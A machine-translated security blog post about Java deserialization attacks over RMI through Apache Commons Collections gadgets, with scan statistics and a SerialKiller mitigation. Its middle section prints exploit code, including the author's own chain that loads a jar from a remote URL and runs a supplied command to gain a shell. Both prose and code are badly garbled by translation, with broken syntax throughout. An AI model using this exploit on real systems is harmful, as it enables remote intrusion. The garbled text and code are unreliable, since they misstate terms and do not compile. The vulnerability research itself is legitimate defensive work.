Java anti-sequence vulnerability is neglected by large-scale killing utilization

A hot-fried Java anti-sequence loophochy, everyone appeared in a very important thing, it is very important in the design of Java in the design of the CS architecture. This design is also used like JBoss. So, I am studying this vulnerability, while watching everyone is playing, I am also very curious in some CS architecture applications achieved through Java (such as the accounting software, content release system) of large-scale state companies, content release system), is it? Also use the library of Apache Commons Collections.

I don’t know if it is to study the big gods of Java Web, they are boring. This vulnerability analysis article has stayed in the utilization play of each middleware in the old blog, but did not pay attention to common Java Web. The architecture will fall due to this problem. And in addition to the article outside the Changting, many other repatriates are mostly targeted, and the standard is not true.

0x01 large-scale utilization of the sins –RMI

Nowadays, now, many of the WEBs developed by Java have also used the distributed distribution. For many large organizations I have learned, they will deploy some Java applications in the background, which is used to publish updated static pages for external websites. And the release of this release command is RMI.

Let’s take a look at the description of RMI on Wikipedia:

Java remote method call, Java RMI (Java Remote Method Invocation) is a Java programming language, an application programming interface for implementing remote procedure calls. It allows programs running on the client to call objects on the remote server. Remote Method Call Features Make Java programmers to distribute operations in a network environment. All of RMI is to simplify the use of remote interface objects as much as possible.

Java RMI is greatly dependent on the interface. When you need to create a remote object, the programmer hides the implementation details of the underlying by passing an interface. The client-side remote object handle is connected to the local root code, which is responsible for communicating through the network. In this way, programmers only need to send messages to how to send messages through their own interface.

More warning is that the transmission process of RMI will inevitably use serialization and reverse sequencing, and if the RMI server interface is open, and the server uses libraries like Apache Commons Collections, it is easy to peep.

The key content that is ignored by 0x02

In the original text of Breenmachine, there are many places to describe the effects on the anti-sequence vulnerability for RMI, such as:

Java loves senting serialized objects all over the place. For example:

In Http Requests – Parameters, ViewState, Cookies, You Name.

RMI – The Extensively Used Java RMI Protocol IS 100% Based on Serialization

RMI over http – Many Java Thick Client Web Apps Use this – Again 100% Serialized Objects

JMX – Again, Relies ON Serialized Objects Being Shot over the Wire

Custom Protocols – Sending An Receiving Raw Java Objects Is The Norm – Which We’ll See in Some of The Exploits To come

100% of RMI is based on reverse sequence.

and this:

If you see port 1099, That’s Java Rmi. RMI By Definition Just Uses Serialized Objects for All Communication. This is trivially Vulnerable, as Seeen in outnms Exploit

If you see 1099 port, this is the default port of Java RMI. RMI defaults to use serialization to complete all interactions. This is a very common vulnerability, just like the OpenNMS Exploit we wrote.

And “Exploit 5 – OpenNMS THROUGH RMI” section is introducing the utilization of RMI. But I have been ignored by everyone, which makes me very well. 0x03 Exploit constructor

RMI’s Exploit construct is relatively easy, and you can write it if you understand the Java programming. Here we simply analyze the implementation of RMI utilization in this tool.

public class RMIRegistryExploit {public static void main (final String [] args) throws Exception {// ensure payload does not detonate during construction or deserialization ExecBlockingSecurityManager.wrap (new Callable & lt; Void> () {public Void call () throws Exception { Registry registry LocateRegistry.getRegistry (args [0], Integer.parseInt (args [1])); String className CommonsCollections1.class.getPackage () getName () + + args [2]. “.”;? Class payloadClass (Class ?) Class.forName (className);. Object payload payloadClass.newInstance () getObject (args [3]); Remote remote Gadgets.createMemoitizedProxy (Gadgets.createMap ( “pwned”, payload), Remote.class; try {registry.bind (“pwned”;} catch (throwable e) {E.PrintStackTrace ();} try {string [] name registry.list (); for (String Name: Names ) {System.out.println (“Looking Up ‘” + Name + “”); try {remote rem registry.lookup (name); system.out.println (arrays.aslist (remoteclass (). GetInterface ))))));} catch (THR Owable e) {E.PrintStackTrace ();}}} catch (throwable e) {E.PrintStackTrace ();} return null;}});}}

In this implementation code, the form of Proxy in Java has been encapsulated for constructed attack PayLoad and a large number of generally used in the process of reharging Proxy. This is the most advantageous benefit of PayLoad, which can deal with a variety of different applications. However, this package affects the format anomalous echo. So, this tool is not too easy to use in the case where you want to get the return interaction. Therefore, I rewrite a tool for realizing returnees, and the RMI uses some code as follows:

public class RMIexploit {public static Constructor getFirstCtor (final String name) throws Exception {final Constructor ctor Class.forName (name) .getDeclaredConstructors () [0] > >; ctor.setAccessible (true); return ctor;} Public static void main (string ip args) {string ip args [0]; int port integer.parseint (args [1]); String Remotejar Args [2]; String Command Args [3]; Final String Ann_inv_handler_class “sun. reflect.annotation.AnnotationInvocationHandler “; try {final Transformer [] transformers new Transformer [] {new ConstantTransformer (, new InvokerTransformer (” getConstructor “, new class [] {class [] class},. New object [] {new class.URL []. class}}), New Invokertransformer (“newinstance”, new class [] {object []. Class}, new object [] {new object [ ] {new [] {new (remotejar)}}}, new invokertransformer (“loadclass”, new class [] {string.class}, new object [] {“ErrorBaseexec” }), New Invokertransformer (“getMethod”, new class [] { ASS, Class []. Class}, new object [] {“do_exec”, new class [] {string.class}}, new invokertransformer (“invoke”, new class [] {Object.class, Object []. class}, new Object [] {null, new String [] {command}})}; Transformer transformedChain new ChainedTransformer (transformers); Map innerMap new HashMap (); innerMap.put ( “value”, “value”); Map outerMap TransformedMap.decorate (innerMap, null, transformedChain); Class cl Class.forName ( “sun.reflect.annotation.AnnotationInvocationHandler”); Constructor ctor cl.getDeclaredConstructor (Class.class, Map.class); ctor.setAccessible (true) Object instance ctor.newinstance (target.class, outermap); Registry Registry LocateRegistry.getRegistry (IP, Port);

InvocationHandler h (InvocationHandler) getFirstCtor (ANN_INV_HANDLER_CLASS) .newInstance (Target.class, outerMap); Remote r Remote.class.cast (Proxy.newProxyInstance (Remote.class.getClassLoader (), new Class [] {Remote.class}, h )); Registry.bind (“PWNED”, R); It is actually very simple, that is, after the original PayLoad generating code, the RMI call is added. This kind of writing I have tested for the JBoss5 and 6 series of versions, and they can get the shell in the case of JMXINVOKER deletion. We have the result of scanning the problem later, which can prove that this Exploit is not only valid for JBOSS, but for the entire RMI protocol.

PS: During my own test, the JBoss4 series seems to have not directly used RMI, so it is not possible to use the EXPLOIT write method given by this section to complete the attack. There is also JBoss7, I found that it seems that I have not opened the RMI-related protocol port (maybe I downloaded the posture is not 233), so there is no test success.

0x04 RMI vulnerability

We use our own full network scan platform Seer to scan all 1090 and 1099 ports:

The 1090 and 1099 ports open 375,4959 units, including 5,3170 units for the host of RMI interaction, accounting for 14.16%.

There are 5,875 deserialized vulnerabilities, accounting for 11.04%.

Among the hosts of the vulnerability, the Linux host 3946 units, which can directly obtain 2531 units of the host of root privileges, accounting for 64.14%; Windows host 1929 units, which can directly obtain 425 hosts, accounting for 22.03%

0x05 repair suggestion

Because many manufacturers got POC in January this year, they did not repair this problem, so there is no official patch to release in the short term. If it attaches great importance to this security issue and wants to have a temporary solution A temporary patch SerialKiller can be released on Github.

After downloading this JAR, place ClassPath, replace in the application code to SerialKiller, then configure it allows you to allow or disable some classes that have problems, serialkiller has hot-reload, whiteliSting, BlackListing, control The trusted type after the external input reverse sequence is entered.

The above refers to the repair suggestions in the Changting Technology Article

LIB address:

The Green Alliance Technology Beverage has been in response to this vulnerability to start emergency response mechanisms, and the hive is the innovative safety scanning plug-in mutual assistance community that is maintained by many R & D staff, engineering staff and service colleagues. It is committed to building a security learning community that is open and shared. Security researchers can obtain vulnerability information on the Internet and then prepare the corresponding scanner according to the development plan of the hive. Enhance your ability from vulnerability analysis, code development, security communication. In addition, in this community, security personnel can easily obtain the corresponding plug-in for security testing, jointly maintaining the Internet security, and witness the powerful ability of the group of bee quality.

0x06 Reference

LIB? General utilization analysis of Java anti-sequence vulnerability

Exploiting Deserialization Vulnerabilities in Java

What do Weblogic, WebSphere, JBoss, Jenkins, OpenNMS, AND Your Application Have In Common? This VulneRability.

AppsecCali 2015 – Marshalling Pickles